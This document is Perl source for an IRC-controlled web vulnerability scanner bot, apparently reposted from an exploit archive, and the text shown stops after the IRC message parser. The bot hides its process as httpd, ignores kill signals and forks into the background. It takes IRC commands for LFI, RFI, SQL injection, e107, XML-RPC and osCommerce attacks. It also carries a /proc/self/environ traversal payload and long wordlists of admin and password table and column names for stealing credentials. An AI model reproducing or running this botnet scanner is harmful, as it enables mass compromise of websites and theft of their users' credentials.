#!/usr/bin/perl ################################################################################################################### # Exploit Title: STUN PRIVATE SCANNER [MIRC BOT] # # Date: 01-01-2011 # # Author: stun - zaki_22 # # Software Link: http://www.lipstick111.com/uploaded/stun.jpg = injector # # Version: 1.11 # # Category:: MIRC BOT SCANNER # ################################################################################################################### ################################################################################################################### # STUN PRIVATE SCANNER # # THANKS TO BaMbY Multi Scanner by BaMbY AND nob0dy Priv8 Scanner SE v1.2 Coded by Vrs-hCk # ################################################################################################################### use HTTP::Request; # use HTTP::Request::Common; # use HTTP::Request::Common qw(POST); # use LWP::Simple; # use LWP 5.64; # use LWP::UserAgent; # use Socket; # use IO::Socket; # use IO::Socket::INET; # use IO::Select; # use MIME::Base64; # ################################################################################################################### my $datetime = localtime; my $fakeproc = "/usr/sbin/httpd"; my $ircserver = "irc.byroe.net"; my $ircport = "6667"; my $nickname = "[scanner]"; my $ident = "stun"; my $channel = "#your_channel"; my $admin = "nick_admin"; my $fullname = " 0,1( 4S T 9UN 4S 0CA 9NN 0ER) "; my $nob0dy = " 4( 8@ 9nob0dy 4) "; my $lfilogo = " 4( 8@ 9LFI 4)"; my $rfilogo = " 4( 8@ 9RFI 4)"; my $e107logo = " 4( 8@ 9e107 4)"; my $xmllogo = " 4( 8@ 9XML 4)"; my $sqllogo = " 4( 8@ 9SQL 4)"; my $oscologo = " 4( 8@ 9OSCO 4)"; my $lficmd = '!lfi'; my $rficmd = '!rfi'; my $e107cmd = '!e107'; my $xmlcmd = '!xml'; my $sqlcmd = '!sql'; my $oscocmd = '!osco'; my $cmdlfi = '!cmdlfi'; my $cmde107 = '!cmde107'; my $cmdxml = '!cmdxml'; my $injector = "http://stunshell"; my $botshell = "http://your-bot"; my $botak = "http://your-bot"; my @uagents = ('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1'); my $uagent = $uagents[rand(scalar(@uagents))]; my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00"; my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario', 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator', 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names', 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass', 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member', 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts', 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors', 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO'); my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email', 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail', 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author', 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo', 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username'); $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/tmp"); $ircserver = "$ARGV[0]" if $ARGV[0]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); my $versi = " 4,1SIX 8NER 9GY. 4I 8n 9c"; sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi"); sleep (1);}} sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$mynick".int rand(1)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bxp"); sendraw("JOIN $channel"); sleep(2); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); } } - See more at: http://www.exploit-id.com/remote-exploits/stun-private-scanner-mirc-bot#sthash.4jOWBeyu.dpuf
